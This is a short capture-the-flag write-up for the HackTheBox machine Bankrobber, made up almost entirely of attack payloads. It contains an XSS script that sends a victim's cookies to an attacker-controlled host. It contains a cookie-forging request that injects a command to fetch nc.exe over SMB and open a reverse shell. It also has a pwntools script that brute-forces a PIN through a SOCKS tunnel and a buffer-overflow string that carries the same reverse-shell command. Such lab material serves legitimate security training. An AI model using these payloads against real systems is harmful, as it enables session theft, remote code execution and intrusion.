Bankrobber @ HackTheBox
Bankrobber is a 50-point machine on HackTheBox that involves exploiting a cross-site scripting vulnerability to gain access to an admin account, using a command injection to get a user shell, and exploiting a simple buffer overflow to become SYSTEM.
Notes
XSS-Payloads:
```html
<script src="http://<ip>:8000/script.js"></script>
```
```javascript
// Requests an image from the attacker-controlled host with document.cookie
// appended to the URL, so the cookie value appears in that host's request log
function addImg(){
    var img = document.createElement('img');
    img.src = 'http://<ip>:8000/' + document.cookie;
    document.body.appendChild(img);
}
addImg();
```
```javascript
// Sets the admin cookies in the victim's browser, then POSTs the command
// to the checker page using that session
document.cookie = "id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D";
var uri = "/admin/backdoorchecker.php";
var xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("cmd=dir|\\\\<ip>\\xshare\\share\\nc.exe <ip> 7000 -e cmd.exe");
```
SSF:
https://securesocketfunneling.github.io/ssf/#home
Python-Scripts:
```python
from pwn import *
import socks  # SOCKS constants used by context.proxy

# Route the connection through the SSF SOCKS forward on localhost:9090
# and talk to the forwarded service on port 910
context.proxy = (socks.SOCKS4, 'localhost', 9090)
p = remote('localhost', 910, level='info')
p.interactive()
```
```python
from pwn import *
import socks  # SOCKS constants used by context.proxy

# Route every connection through the SSF SOCKS forward on localhost:9090
context.proxy = (socks.SOCKS4, 'localhost', 9090)

for i in range(1000):
    p = remote('localhost', 910, level='info')
    p.recvuntil(b'[$] ')
    pin = str(i).zfill(4)          # zero-padded four-digit PIN
    p.sendline(pin.encode())
    result = p.recvline()          # bytes under Python 3, so compare with bytes
    if b"denied" not in result:
        log.success("Found Pin:" + pin)
        break
    p.close()                      # wrong guess: drop the connection before the next try

p.interactive()
```
Overflow-Payload:
```text
AAAAAAAABBBBBBBCCCCCCCCDDDDDDD\\\\10.10.14.2\xshare\share\nc.exe <ip> 7000 -e cmd.exe
```
This post is licensed under CC BY 4.0 by the author.